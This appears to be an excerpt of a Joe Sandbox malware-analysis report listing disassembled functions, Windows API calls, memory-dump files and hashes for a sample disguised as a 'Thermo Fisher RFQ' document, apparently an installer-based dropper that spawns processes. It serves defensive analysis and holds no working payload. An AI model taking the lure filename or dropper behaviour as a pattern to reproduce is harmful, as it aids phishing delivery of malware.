Function 0040451F Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404531

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f1c7da54befd6d6a563f00396e813b8d921f3a4fa707ebac73e9c93964ba1fa7
Instruction ID: 80e323bcaa4fb1d2d6ad7f8777a1edc32b6b0207238f0482179e9273dd0660e4
Opcode Fuzzy Hash: f1c7da54befd6d6a563f00396e813b8d921f3a4fa707ebac73e9c93964ba1fa7
Instruction Fuzzy Hash: 10C09BB57443007BDA149B509E45F17776467D4741F14C5797340F50F0C774E450D62C

Function 00405B7A Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 00405B89

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29

Function 00404508 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000001,00404333), ref: 00404516

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d8acea26a230a6f6dce64032923e754adb325d86aa568b2d6d5b5dd5df397682
Instruction ID: c6ab7f6cffe81da1172822363f1dd48ca364d348eecf8336b79a6db78a7c4a26
Opcode Fuzzy Hash: d8acea26a230a6f6dce64032923e754adb325d86aa568b2d6d5b5dd5df397682
Instruction Fuzzy Hash: 18B09235184A00ABDA515B00DE09F467B62E7A4701F008538B240640F0CBB200A0DB0A

Function 004034E7 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 004034F5

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Function 004044F5 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,004042CC), ref: 004044FF

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: c966d15b9c294ca5f877954a8561fb6b5762177598d7c32600178bcf5d115e9d
Instruction ID: b0a400b6fcb01754b069d8f8c1c9044561b78d1e04efb9d0fff21555a903a89e
Opcode Fuzzy Hash: c966d15b9c294ca5f877954a8561fb6b5762177598d7c32600178bcf5d115e9d
Instruction Fuzzy Hash: DFA00176444910ABDA02AB50EF0984ABB62FBE5701B519879A286510348B365820FB19

Function 00401FC9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 004055D9: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,00000000,0079A700,75F023A0,?,?,?,?,?,?,?,?,?,0040341A,00000000,?), ref: 00405611
Part of subcall function 004055D9: lstrlenW.KERNEL32(0040341A,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,00000000,0079A700,75F023A0,?,?,?,?,?,?,?,?,?,0040341A,00000000), ref: 00405621
Part of subcall function 004055D9: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,0040341A,0040341A,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,00000000,0079A700,75F023A0), ref: 00405634
Part of subcall function 004055D9: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll), ref: 00405646
Part of subcall function 004055D9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
Part of subcall function 004055D9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405686
Part of subcall function 004055D9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694

Part of subcall function 00405B37: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?,?,?,1012,?), ref: 00405B60
Part of subcall function 00405B37: CloseHandle.KERNEL32(?,?,?,1012,?), ref: 00405B6D

CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00402010

Part of subcall function 004069F3: WaitForSingleObject.KERNEL32(?,?,00000000,00000000,?,?,00401FC4,?,?,?,?,?,?), ref: 00406A04
Part of subcall function 004069F3: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A26

Part of subcall function 0040649B: wsprintfW.USER32 ref: 004064A8

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 73d48fa51c11560306f2ecb512b72b21235bf248d8e77f8fe192972158bbb83d
Instruction ID: 31278e7032d6d459f1869afa1fc16bf8b986fef5f9539014001fbe5517bff4f7
Opcode Fuzzy Hash: 73d48fa51c11560306f2ecb512b72b21235bf248d8e77f8fe192972158bbb83d
Instruction Fuzzy Hash: 83F09672905511DBDB20BBA59A8999E7664DF0031CF21413FF202B25D5CABC4E41EA6E

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 004014EA

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: b83d77026a0eef837aee2cf9f67490139d75f0ecd08a9ee5abe0a22eb8051c76
Instruction ID: e3f6ed4717897a2e6ecee164b05e04455bfe3191319e132c95f7d07364d35911
Opcode Fuzzy Hash: b83d77026a0eef837aee2cf9f67490139d75f0ecd08a9ee5abe0a22eb8051c76
Instruction Fuzzy Hash: 48D0A773A146008BD744EBB8BE8546F73E8FB903193204C3BD102E10E1E67CC911461C

Function 6FE712BB Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(?,?,6FE712DB,?,6FE7137F,00000019,6FE711CA,-000000A0), ref: 6FE712C5

Memory Dump Source

Source File: 00000000.00000002.87376840731.000000006FE71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FE70000, based on PE: true

Associated: 00000000.00000002.87376762635.000000006FE70000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.87376915461.000000006FE74000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.87376990254.000000006FE76000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fe70000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 5c7f72851969baaf8b68c21a8381f2b15a619e4b75e93c89b9637ffc74310c67
Instruction ID: 50fd2404f3809d8114db822cfc8ff93c6ac2c6e8b732729983da9afd46ca937e
Opcode Fuzzy Hash: 5c7f72851969baaf8b68c21a8381f2b15a619e4b75e93c89b9637ffc74310c67
Instruction Fuzzy Hash: BCB01270600510DFEE00CB18EC0AF343AD6F703310F040001F600C1040C1206820C525

Non-executed Functions

Function 004049C4 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404A13
SetWindowTextW.USER32(00000000,-007A9000), ref: 00404A3D
SHBrowseForFolderW.SHELL32(?), ref: 00404AEE
CoTaskMemFree.OLE32(00000000), ref: 00404AF9
lstrcmpiW.KERNEL32(Call,007A1748,00000000,?,-007A9000), ref: 00404B2B
lstrcatW.KERNEL32(-007A9000,Call), ref: 00404B37
SetDlgItemTextW.USER32(?,000003FB,-007A9000), ref: 00404B49

Part of subcall function 00405B98: GetDlgItemTextW.USER32(?,?,00000400,00404B80), ref: 00405BAB

Part of subcall function 00406802: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe",75F03420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,?,0000000A,?), ref: 00406865
Part of subcall function 00406802: CharNextW.USER32(?,?,?,00000000,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00406874
Part of subcall function 00406802: CharNextW.USER32(?,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe",75F03420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,?,0000000A,?), ref: 00406879
Part of subcall function 00406802: CharPrevW.USER32(?,?,75F03420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,?,0000000A,?), ref: 0040688C

GetDiskFreeSpaceW.KERNEL32(0079F718,?,?,0000040F,?,0079F718,0079F718,-007A9000,00000001,0079F718,-007A9000,-007A9000,000003FB,-007A9000), ref: 00404C0C
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C27

Part of subcall function 00404D80: lstrlenW.KERNEL32(007A1748,007A1748,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,-007A9000), ref: 00404E21
Part of subcall function 00404D80: wsprintfW.USER32 ref: 00404E2A
Part of subcall function 00404D80: SetDlgItemTextW.USER32(?,007A1748), ref: 00404E3D

Strings

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical, xrefs: 00404B14
A, xrefs: 00404AE7
Call, xrefs: 00404B25, 00404B2A, 00404B35

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical$Call
API String ID: 2624150263-477905931
Opcode ID: d546a645e60e6957f04ba02b6a3eb8270b6339cfa2b22d8784a61d082e69804a
Instruction ID: db18d61dd8e36d4389a3b44505c0f864e6ca322f8728bcf89e652d7f1c678b9a
Opcode Fuzzy Hash: d546a645e60e6957f04ba02b6a3eb8270b6339cfa2b22d8784a61d082e69804a
Instruction Fuzzy Hash: 25A185B1900208ABDB11AFA5DD45BEFB7B8EF84314F11403BF611B62D1D77C9A418B69

Function 00404F40 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F58
GetDlgItem.USER32(?,00000408), ref: 00404F63
GlobalAlloc.KERNEL32(?,?), ref: 00404FAD
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC4
SetWindowLongW.USER32(?,?,0040554D), ref: 00404FDD
ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404FF1
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405003
SendMessageW.USER32(?,00001109,00000002), ref: 00405019
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405025
SendMessageW.USER32(?,0000111B,?,00000000), ref: 00405037
DeleteObject.GDI32(00000000), ref: 0040503A
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405065
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405071
SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510C
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513C

Part of subcall function 00404508: SendMessageW.USER32(?,?,00000001,00404333), ref: 00404516

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405150
GetWindowLongW.USER32(?,?), ref: 0040517E
SetWindowLongW.USER32(?,?,00000000), ref: 0040518C
ShowWindow.USER32(?,00000005), ref: 0040519C
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405297
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FC
SendMessageW.USER32(?,?,00000000,00000000), ref: 00405311
SendMessageW.USER32(?,00000420,00000000,?), ref: 00405335
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405355
ImageList_Destroy.COMCTL32(?), ref: 0040536A
GlobalFree.KERNEL32(?), ref: 0040537A
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F3
SendMessageW.USER32(?,00001102,?,?), ref: 0040549C
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AB
InvalidateRect.USER32(?,00000000,00000001), ref: 004054D6
ShowWindow.USER32(?,00000000), ref: 00405524
GetDlgItem.USER32(?,000003FE), ref: 0040552F
ShowWindow.USER32(00000000), ref: 00405536

Strings

, xrefs: 0040550E
N, xrefs: 004051D5
M, xrefs: 004050F4

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 59a12151f687aa456750a72bebcaf03031b6b48c6fd142b985938e878f33cd06
Instruction ID: 3f60975f1bbea04172c566a814ac76c3bf8fe72ba7ce1bc18d7d222ec834a39f
Opcode Fuzzy Hash: 59a12151f687aa456750a72bebcaf03031b6b48c6fd142b985938e878f33cd06
Instruction Fuzzy Hash: B2027870900609AFDF20DF65DC85AAF7BB5FB85314F10816AFA10BA2E1D7798A41CF58

Function 00404692 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404730
GetDlgItem.USER32(?,000003E8), ref: 00404744
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404761
GetSysColor.USER32(?), ref: 00404772
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404780
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040478E
lstrlenW.KERNEL32(?), ref: 00404793
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A0
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B5
GetDlgItem.USER32(?,0000040A), ref: 0040480E
SendMessageW.USER32(00000000), ref: 00404815
GetDlgItem.USER32(?,000003E8), ref: 00404840
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404883
LoadCursorW.USER32(00000000,00007F02), ref: 00404891
SetCursor.USER32(00000000), ref: 00404894
LoadCursorW.USER32(00000000,00007F00), ref: 004048AD
SetCursor.USER32(00000000), ref: 004048B0
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048DF
SendMessageW.USER32(?,00000000,00000000), ref: 004048F1

Strings

F@, xrefs: 0040489C
Call, xrefs: 0040486F
N, xrefs: 0040482E

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
